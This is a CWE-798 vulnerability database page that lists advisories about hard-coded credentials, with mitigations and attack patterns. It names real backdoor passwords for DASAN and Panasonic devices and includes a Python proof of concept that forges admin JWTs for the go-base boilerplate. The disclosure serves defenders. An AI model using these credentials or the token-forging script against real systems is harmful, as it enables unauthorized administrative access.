Common Weakness Enumeration

CWE-798

Allowed-with-Review

Use of Hard-coded Credentials

Abstraction: Base · Status: Draft

The product contains hard-coded credentials, such as a password or cryptographic key.

2176 vulnerabilities reference this CWE, most recent first.

GHSA-MPFX-7R3V-H2QR

Vulnerability from github – Published: 2022-05-13 01:37 – Updated: 2022-05-13 01:37
VLAI
Details

Boston Scientific ZOOM LATITUDE PRM Model 3120 uses a hard-coded cryptographic key to encrypt PHI prior to having it transferred to removable media. CVSS v3 base score: 4.6; CVSS vector string: AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2017-14014"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-798"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2018-05-01T18:29:00Z",
    "severity": "MODERATE"
  },
  "details": "Boston Scientific ZOOM LATITUDE PRM Model 3120 uses a hard-coded cryptographic key to encrypt PHI prior to having it transferred to removable media. CVSS v3 base score: 4.6; CVSS vector string: AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N.",
  "id": "GHSA-mpfx-7r3v-h2qr",
  "modified": "2022-05-13T01:37:39Z",
  "published": "2022-05-13T01:37:39Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-14014"
    },
    {
      "type": "WEB",
      "url": "https://ics-cert.us-cert.gov/advisories/ICSMA-17-292-01"
    },
    {
      "type": "WEB",
      "url": "http://www.securityfocus.com/bid/101510"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-MQ5X-9PVH-H33V

Vulnerability from github – Published: 2022-05-13 01:22 – Updated: 2022-05-13 01:22
VLAI
Details

The backdoor account dnsekakf2$$ in /bin/login on DASAN H665 devices with firmware 1.46p1-0028 allows an attacker to login to the admin account via TELNET.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2019-8950"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-798"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2019-02-20T04:29:00Z",
    "severity": "CRITICAL"
  },
  "details": "The backdoor account dnsekakf2$$ in /bin/login on DASAN H665 devices with firmware 1.46p1-0028 allows an attacker to login to the admin account via TELNET.",
  "id": "GHSA-mq5x-9pvh-h33v",
  "modified": "2022-05-13T01:22:57Z",
  "published": "2022-05-13T01:22:57Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-8950"
    },
    {
      "type": "WEB",
      "url": "https://blog.burghardt.pl/2019/02/dasan-h665-has-vendor-backdoor-built-into-busyboxs-bin-login"
    },
    {
      "type": "WEB",
      "url": "https://seclists.org/bugtraq/2019/Feb/32"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-MQ8H-JV5C-736F

Vulnerability from github – Published: 2022-05-13 01:10 – Updated: 2022-05-13 01:10
VLAI
Details

MaLion for Windows and Mac versions 3.2.1 to 5.2.1 uses a hardcoded cryptographic key which may allow an attacker to alter the connection settings of Terminal Agent and spoof the Relay Service.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2017-10818"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-798"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2017-08-04T16:29:00Z",
    "severity": "CRITICAL"
  },
  "details": "MaLion for Windows and Mac versions 3.2.1 to 5.2.1 uses a hardcoded cryptographic key which may allow an attacker to alter the connection settings of Terminal Agent and spoof the Relay Service.",
  "id": "GHSA-mq8h-jv5c-736f",
  "modified": "2022-05-13T01:10:04Z",
  "published": "2022-05-13T01:10:04Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-10818"
    },
    {
      "type": "WEB",
      "url": "https://jvn.jp/en/vu/JVNVU91587298/index.html"
    },
    {
      "type": "WEB",
      "url": "http://www.intercom.co.jp/information/2017/0801.html"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-MQJ9-W9CH-6XMR

Vulnerability from github – Published: 2023-06-13 09:30 – Updated: 2024-04-04 04:46
VLAI
Details

A vulnerability has been identified in CP-8031 MASTER MODULE (All versions < CPCI85 V05), CP-8050 MASTER MODULE (All versions < CPCI85 V05). The affected devices contain the hash of the root password in a hard-coded form, which could be exploited for UART console login to the device. An attacker with direct physical access could exploit this vulnerability.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2023-33920"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-798"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2023-06-13T09:15:18Z",
    "severity": "MODERATE"
  },
  "details": "A vulnerability has been identified in CP-8031 MASTER MODULE (All versions \u003c CPCI85 V05), CP-8050 MASTER MODULE (All versions \u003c CPCI85 V05). The affected devices contain the hash of the root password in a hard-coded form, which could be exploited for UART console login to the device. An attacker with direct physical access could exploit this vulnerability.",
  "id": "GHSA-mqj9-w9ch-6xmr",
  "modified": "2024-04-04T04:46:05Z",
  "published": "2023-06-13T09:30:20Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-33920"
    },
    {
      "type": "WEB",
      "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-731916.pdf"
    },
    {
      "type": "WEB",
      "url": "http://packetstormsecurity.com/files/173370/Siemens-A8000-CP-8050-CP-8031-Code-Execution-Command-Injection.html"
    },
    {
      "type": "WEB",
      "url": "http://seclists.org/fulldisclosure/2023/Jul/14"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-MQP6-5V25-72QQ

Vulnerability from github – Published: 2022-05-24 17:37 – Updated: 2022-05-24 17:37
VLAI
Details

Panasonic Security System WV-S2231L 4.25 has an insecure hard-coded password of lkjhgfdsa (which is just the asdf keyboard row in reverse order).

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2020-29193"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-798"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2020-12-28T07:15:00Z",
    "severity": "MODERATE"
  },
  "details": "Panasonic Security System WV-S2231L 4.25 has an insecure hard-coded password of lkjhgfdsa (which is just the asdf keyboard row in reverse order).",
  "id": "GHSA-mqp6-5v25-72qq",
  "modified": "2022-05-24T17:37:26Z",
  "published": "2022-05-24T17:37:26Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-29193"
    },
    {
      "type": "WEB",
      "url": "https://github.com/cecada/Panasonic-WV-S2231L/blob/main/README.md"
    },
    {
      "type": "WEB",
      "url": "https://security.panasonic.com/products_technology/products/wv-s2231l"
    }
  ],
  "schema_version": "1.4.0",
  "severity": []
}

GHSA-MQQ6-462X-JXMM

Vulnerability from github – Published: 2026-06-10 13:39 – Updated: 2026-06-10 13:39
VLAI
Summary
Go Restful API Boilerplate: Hardcoded JWT Secret "random" Allows Token Forgery
Details

Vulnerability: CWE-798 — Hardcoded JWT Secret + Broken Mitigation

Affected Component

  • github.com/dhax/go-base — Go REST API boilerplate (go-chi/jwtauth/v5, Viper, PostgreSQL/Bun)
  • 1,685 stars on GitHub

Vulnerability Locations

File Line Role
dev.env 10 AUTH_JWT_SECRET=random — template default shipped to all users
cmd/serve.go 35 viper.SetDefault("auth_jwt_secret", "random") — code-level fallback
auth/jwt/tokenauth.go 22-25 Weak mitigation: only checked literal "random", auto-generated non-persistent key
auth/jwt/tokenauth.go 28 jwtauth.New("HS256", []byte(secret), nil) — creates JWT signer with the weak key
pwdless/api.go 203 GenTokenPair() — issues access + refresh tokens signed with the weak key

Data Flow

dev.env AUTH_JWT_SECRET=random
  OR
cmd/serve.go viper.SetDefault("auth_jwt_secret", "random")
    │
    ▼
auth/jwt/tokenauth.go: viper.GetString("auth_jwt_secret")
    │
    ▼
auth/jwt/tokenauth.go: jwtauth.New("HS256", []byte(secret), nil)
    │
    ▼
pwdless/api.go: GenTokenPair() → access + refresh tokens
    │
    ▼
jwt/authenticator.go: Every authenticated request trusts the forged token

Description

The JWT signing secret is hardcoded to the string "random" in two independent locations:

  1. dev.env:10 — The template .env file sets AUTH_JWT_SECRET=random. Every developer who copies this template gets the same default.

  2. cmd/serve.go:35viper.SetDefault("auth_jwt_secret", "random") provides a programmatic fallback. Even if the .env file is missing entirely, the application silently starts with "random" as the signing key.

The original code contained a mitigation in auth/jwt/tokenauth.go:22-25 that checked if the secret equaled "random" and replaced it with a randomly-generated 32-byte string. This mitigation had two fatal flaws:

  • (a) Single-value check: Only the exact string "random" was caught. Any other weak secret (e.g., "secret", "changeme", empty string) passed through unchecked.
  • (b) Non-persistent replacement: The auto-generated key was stored only in memory (randStringBytes(32)), not persisted. On every restart, all existing tokens became invalid without warning, breaking all active user sessions. This made the "fix" itself a denial-of-service.

An attacker who reads the public repository knows the signing key is "random". They can forge JWT tokens for arbitrary users (including admin roles), gaining complete authentication bypass on all protected API endpoints.

Proof of Concept

import jwt
import requests

# The hardcoded secret from dev.env / serve.go (public repository)
SECRET = "random"
BASE_URL = "http://target:3000"

# Step 1: Forge an admin JWT token
payload = {
    "sub": "admin@example.com",
    "roles": ["admin"],
    "iat": 9999999000,
    "exp": 9999999999
}
forged_token = jwt.encode(payload, SECRET, algorithm="HS256")

# Step 2: Access any protected endpoint with the forged token
headers = {"Authorization": f"Bearer {forged_token}"}

# List all users (requires admin)
r = requests.get(f"{BASE_URL}/api/v1/admin/users", headers=headers)
print(f"Status: {r.status_code}")  # 200 OK

# Access own profile with forged identity
r = requests.get(f"{BASE_URL}/api/v1/me", headers=headers)
print(f"Profile: {r.json()}")  # Returns admin@example.com profile

# The forged token is also accepted by refresh endpoints
r = requests.post(f"{BASE_URL}/api/v1/token/refresh", headers=headers)
# Returns a new valid token signed with the same "random" secret

Impact

  • Authentication Bypass: Forge tokens for any user, including admin roles
  • Confidentiality: Access all user data, profiles, and protected resources
  • Integrity: Modify any data accessible via the API
  • Persistence: Forged tokens remain valid until expiry (or indefinitely via refresh)

Fix (PR #31)

The fix replaced the single-value check with a comprehensive approach:

// BEFORE (tokenauth.go:22-25) — weak, single-value check
if secret == "random" {
    secret = randStringBytes(32) // non-persistent, breaks on restart
}

// AFTER — comprehensive known-weak-secrets map
var knownWeakSecrets = map[string]bool{
    "random": true,
    "secret": true,
    "changeme": true,
    "change-me": true,
    "default": true,
    "": true,
}

if knownWeakSecrets[secret] {
    log.Fatal("JWT secret is a known weak value. Please set a strong AUTH_JWT_SECRET.")
}

Plus: minimum 32-character length check, removal of non-persistent auto-generation, and clear generation instructions (openssl rand -base64 32) in the template.

Patched Versions

  • All versions after commit range including PR#31 (merged May 17, 2026).
  • Users should update to the latest master, regenerate their JWT secret, and restart.

Resources

  • Fix PR: https://github.com/dhax/go-base/pull/31
  • Commit history: https://github.com/dhax/go-base/commits/master

Credit

Reported by @saaa99999999 via manual security audit.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/dhax/go-base"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.0.0-20260517152733-cc82b9740fa6"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-48031"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-798"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-06-10T13:39:18Z",
    "nvd_published_at": null,
    "severity": "CRITICAL"
  },
  "details": "## Vulnerability: CWE-798 \u2014 Hardcoded JWT Secret + Broken Mitigation\n\n### Affected Component\n- `github.com/dhax/go-base` \u2014 Go REST API boilerplate (go-chi/jwtauth/v5, Viper, PostgreSQL/Bun)\n- 1,685 stars on GitHub\n\n### Vulnerability Locations\n\n| File | Line | Role |\n|------|------|------|\n| `dev.env` | 10 | `AUTH_JWT_SECRET=random` \u2014 template default shipped to all users |\n| `cmd/serve.go` | 35 | `viper.SetDefault(\"auth_jwt_secret\", \"random\")` \u2014 code-level fallback |\n| `auth/jwt/tokenauth.go` | 22-25 | Weak mitigation: only checked literal `\"random\"`, auto-generated non-persistent key |\n| `auth/jwt/tokenauth.go` | 28 | `jwtauth.New(\"HS256\", []byte(secret), nil)` \u2014 creates JWT signer with the weak key |\n| `pwdless/api.go` | 203 | `GenTokenPair()` \u2014 issues access + refresh tokens signed with the weak key |\n\n### Data Flow\n\n```\ndev.env AUTH_JWT_SECRET=random\n  OR\ncmd/serve.go viper.SetDefault(\"auth_jwt_secret\", \"random\")\n    \u2502\n    \u25bc\nauth/jwt/tokenauth.go: viper.GetString(\"auth_jwt_secret\")\n    \u2502\n    \u25bc\nauth/jwt/tokenauth.go: jwtauth.New(\"HS256\", []byte(secret), nil)\n    \u2502\n    \u25bc\npwdless/api.go: GenTokenPair() \u2192 access + refresh tokens\n    \u2502\n    \u25bc\njwt/authenticator.go: Every authenticated request trusts the forged token\n```\n\n### Description\n\nThe JWT signing secret is hardcoded to the string `\"random\"` in **two independent locations**:\n\n1. **`dev.env:10`** \u2014 The template `.env` file sets `AUTH_JWT_SECRET=random`. Every developer who copies this template gets the same default.\n\n2. **`cmd/serve.go:35`** \u2014 `viper.SetDefault(\"auth_jwt_secret\", \"random\")` provides a programmatic fallback. Even if the `.env` file is missing entirely, the application silently starts with `\"random\"` as the signing key.\n\nThe original code contained a mitigation in `auth/jwt/tokenauth.go:22-25` that checked if the secret equaled `\"random\"` and replaced it with a randomly-generated 32-byte string. This mitigation had **two fatal flaws**:\n\n- **(a) Single-value check**: Only the exact string `\"random\"` was caught. Any other weak secret (e.g., `\"secret\"`, `\"changeme\"`, empty string) passed through unchecked.\n- **(b) Non-persistent replacement**: The auto-generated key was stored only in memory (`randStringBytes(32)`), not persisted. On **every restart**, all existing tokens became invalid without warning, breaking all active user sessions. This made the \"fix\" itself a denial-of-service.\n\nAn attacker who reads the public repository knows the signing key is `\"random\"`. They can forge JWT tokens for arbitrary users (including admin roles), gaining complete authentication bypass on all protected API endpoints.\n\n### Proof of Concept\n\n```python\nimport jwt\nimport requests\n\n# The hardcoded secret from dev.env / serve.go (public repository)\nSECRET = \"random\"\nBASE_URL = \"http://target:3000\"\n\n# Step 1: Forge an admin JWT token\npayload = {\n    \"sub\": \"admin@example.com\",\n    \"roles\": [\"admin\"],\n    \"iat\": 9999999000,\n    \"exp\": 9999999999\n}\nforged_token = jwt.encode(payload, SECRET, algorithm=\"HS256\")\n\n# Step 2: Access any protected endpoint with the forged token\nheaders = {\"Authorization\": f\"Bearer {forged_token}\"}\n\n# List all users (requires admin)\nr = requests.get(f\"{BASE_URL}/api/v1/admin/users\", headers=headers)\nprint(f\"Status: {r.status_code}\")  # 200 OK\n\n# Access own profile with forged identity\nr = requests.get(f\"{BASE_URL}/api/v1/me\", headers=headers)\nprint(f\"Profile: {r.json()}\")  # Returns admin@example.com profile\n\n# The forged token is also accepted by refresh endpoints\nr = requests.post(f\"{BASE_URL}/api/v1/token/refresh\", headers=headers)\n# Returns a new valid token signed with the same \"random\" secret\n```\n\n### Impact\n\n- **Authentication Bypass**: Forge tokens for any user, including admin roles\n- **Confidentiality**: Access all user data, profiles, and protected resources\n- **Integrity**: Modify any data accessible via the API\n- **Persistence**: Forged tokens remain valid until expiry (or indefinitely via refresh)\n\n### Fix (PR #31)\n\nThe fix replaced the single-value check with a comprehensive approach:\n\n```go\n// BEFORE (tokenauth.go:22-25) \u2014 weak, single-value check\nif secret == \"random\" {\n    secret = randStringBytes(32) // non-persistent, breaks on restart\n}\n\n// AFTER \u2014 comprehensive known-weak-secrets map\nvar knownWeakSecrets = map[string]bool{\n    \"random\": true,\n    \"secret\": true,\n    \"changeme\": true,\n    \"change-me\": true,\n    \"default\": true,\n    \"\": true,\n}\n\nif knownWeakSecrets[secret] {\n    log.Fatal(\"JWT secret is a known weak value. Please set a strong AUTH_JWT_SECRET.\")\n}\n```\n\nPlus: minimum 32-character length check, removal of non-persistent auto-generation, and clear generation instructions (`openssl rand -base64 32`) in the template.\n\n### Patched Versions\n\n- All versions after commit range including PR#31 (merged May 17, 2026).\n- Users should update to the latest master, regenerate their JWT secret, and restart.\n\n### Resources\n\n- Fix PR: https://github.com/dhax/go-base/pull/31\n- Commit history: https://github.com/dhax/go-base/commits/master\n\n### Credit\n\nReported by @saaa99999999 via manual security audit.",
  "id": "GHSA-mqq6-462x-jxmm",
  "modified": "2026-06-10T13:39:18Z",
  "published": "2026-06-10T13:39:18Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/dhax/go-base/security/advisories/GHSA-mqq6-462x-jxmm"
    },
    {
      "type": "WEB",
      "url": "https://github.com/dhax/go-base/commit/cc82b9740fa6b08e0fad409cd4b418e240dd0e00"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/dhax/go-base"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Go Restful API Boilerplate: Hardcoded JWT Secret \"random\" Allows Token Forgery"
}

GHSA-MQXJ-M3GW-P6FR

Vulnerability from github – Published: 2022-05-14 01:43 – Updated: 2022-05-14 01:43
VLAI
Details

Hardcoded credentials in the Ricoh myPrint application 2.9.2.4 for Windows and 2.2.7 for Android give access to any externally disclosed myPrint WSDL API, as demonstrated by discovering API secrets of related Google cloud printers, encrypted passwords of mail servers, and names of printed files.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2018-18006"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-798"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2018-12-14T15:29:00Z",
    "severity": "CRITICAL"
  },
  "details": "Hardcoded credentials in the Ricoh myPrint application 2.9.2.4 for Windows and 2.2.7 for Android give access to any externally disclosed myPrint WSDL API, as demonstrated by discovering API secrets of related Google cloud printers, encrypted passwords of mail servers, and names of printed files.",
  "id": "GHSA-mqxj-m3gw-p6fr",
  "modified": "2022-05-14T01:43:42Z",
  "published": "2022-05-14T01:43:42Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-18006"
    },
    {
      "type": "WEB",
      "url": "http://packetstormsecurity.com/files/150399/Ricoh-myPrint-Hardcoded-Credentials-Information-Disclosure.html"
    },
    {
      "type": "WEB",
      "url": "http://seclists.org/fulldisclosure/2018/Nov/46"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-MR9H-R8JV-MPQC

Vulnerability from github – Published: 2026-02-04 00:30 – Updated: 2026-02-04 00:30
VLAI
Details

Netis E1+ version 1.2.32533 contains a hardcoded root account vulnerability that allows unauthenticated attackers to access the device with predefined credentials. Attackers can leverage the embedded root account with a crackable password to gain full administrative access to the network device.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2020-37092"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-798"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-02-03T22:16:25Z",
    "severity": "CRITICAL"
  },
  "details": "Netis E1+ version 1.2.32533 contains a hardcoded root account vulnerability that allows unauthenticated attackers to access the device with predefined credentials. Attackers can leverage the embedded root account with a crackable password to gain full administrative access to the network device.",
  "id": "GHSA-mr9h-r8jv-mpqc",
  "modified": "2026-02-04T00:30:29Z",
  "published": "2026-02-04T00:30:29Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-37092"
    },
    {
      "type": "WEB",
      "url": "https://www.exploit-db.com/exploits/48382"
    },
    {
      "type": "WEB",
      "url": "https://www.vulncheck.com/advisories/netis-e-backdoor-account-root"
    },
    {
      "type": "WEB",
      "url": "http://www.netis-systems.com"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
      "type": "CVSS_V4"
    }
  ]
}

GHSA-MRF8-4J8F-G2HR

Vulnerability from github – Published: 2022-04-28 00:00 – Updated: 2022-05-12 00:01
VLAI
Details

In Bender/ebee Charge Controllers in multiple versions are prone to Hardcoded Credentials. Bender charge controller CC612 in version 5.20.1 and below is prone to hardcoded ssh credentials. An attacker may use the password to gain administrative access to the web-UI.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2021-34601"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-798"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2022-04-27T16:15:00Z",
    "severity": "CRITICAL"
  },
  "details": "In Bender/ebee Charge Controllers in multiple versions are prone to Hardcoded Credentials. Bender charge controller CC612 in version 5.20.1 and below is prone to hardcoded ssh credentials. An attacker may use the password to gain administrative access to the web-UI.",
  "id": "GHSA-mrf8-4j8f-g2hr",
  "modified": "2022-05-12T00:01:21Z",
  "published": "2022-04-28T00:00:31Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-34601"
    },
    {
      "type": "WEB",
      "url": "https://cert.vde.com/en/advisories/VDE-2021-047"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-MV7Q-MM4H-856R

Vulnerability from github – Published: 2025-03-05 09:30 – Updated: 2025-03-05 09:30
VLAI
Details

An unauthenticated remote attacker can use hard-coded credentials to gain full administration privileges on the affected product.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-1393"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-798"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-03-05T08:15:35Z",
    "severity": "CRITICAL"
  },
  "details": "An unauthenticated remote attacker can use hard-coded credentials to gain full administration privileges on the affected product.",
  "id": "GHSA-mv7q-mm4h-856r",
  "modified": "2025-03-05T09:30:52Z",
  "published": "2025-03-05T09:30:52Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-1393"
    },
    {
      "type": "WEB",
      "url": "https://certvde.com/en/advisories/VDE-2025-021"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

Mitigation
Architecture and Design
  • For outbound authentication: store passwords, keys, and other credentials outside of the code in a strongly-protected, encrypted configuration file or database that is protected from access by all outsiders, including other local users on the same system. Properly protect the key (CWE-320). If you cannot use encryption to protect the file, then make sure that the permissions are as restrictive as possible [REF-7].
  • In Windows environments, the Encrypted File System (EFS) may provide some protection.
Mitigation
Architecture and Design

For inbound authentication: Rather than hard-code a default username and password, key, or other authentication credentials for first time logins, utilize a "first login" mode that requires the user to enter a unique strong password or key.

Mitigation
Architecture and Design

If the product must contain hard-coded credentials or they cannot be removed, perform access control checks and limit which entities can access the feature that requires the hard-coded credentials. For example, a feature might only be enabled through the system console instead of through a network connection.

Mitigation
Architecture and Design
  • For inbound authentication using passwords: apply strong one-way hashes to passwords and store those hashes in a configuration file or database with appropriate access control. That way, theft of the file/database still requires the attacker to try to crack the password. When handling an incoming password during authentication, take the hash of the password and compare it to the saved hash.
  • Use randomly assigned salts for each separate hash that is generated. This increases the amount of computation that an attacker needs to conduct a brute-force attack, possibly limiting the effectiveness of the rainbow table method.
Mitigation
Architecture and Design
  • For front-end to back-end connections: Three solutions are possible, although none are complete.
  • The first suggestion involves the use of generated passwords or keys that are changed automatically and must be entered at given time intervals by a system administrator. These passwords will be held in memory and only be valid for the time intervals.
  • Next, the passwords or keys should be limited at the back end to only performing actions valid for the front end, as opposed to having full access.
  • Finally, the messages sent should be tagged and checksummed with time sensitive values so as to prevent replay-style attacks.
CAPEC-191: Read Sensitive Constants Within an Executable

An adversary engages in activities to discover any sensitive constants present within the compiled code of an executable. These constants may include literal ASCII strings within the file itself, or possibly strings hard-coded into particular routines that can be revealed by code refactoring methods including static and dynamic analysis.

CAPEC-70: Try Common or Default Usernames and Passwords

An adversary may try certain common or default usernames and passwords to gain access into the system and perform unauthorized actions. An adversary may try an intelligent brute force using empty passwords, known vendor default credentials, as well as a dictionary of common usernames and passwords. Many vendor products come preconfigured with default (and thus well-known) usernames and passwords that should be deleted prior to usage in a production environment. It is a common mistake to forget to remove these default login credentials. Another problem is that users would pick very simple (common) passwords (e.g. "secret" or "password") that make it easier for the attacker to gain access to the system compared to using a brute force attack or even a dictionary attack using a full dictionary.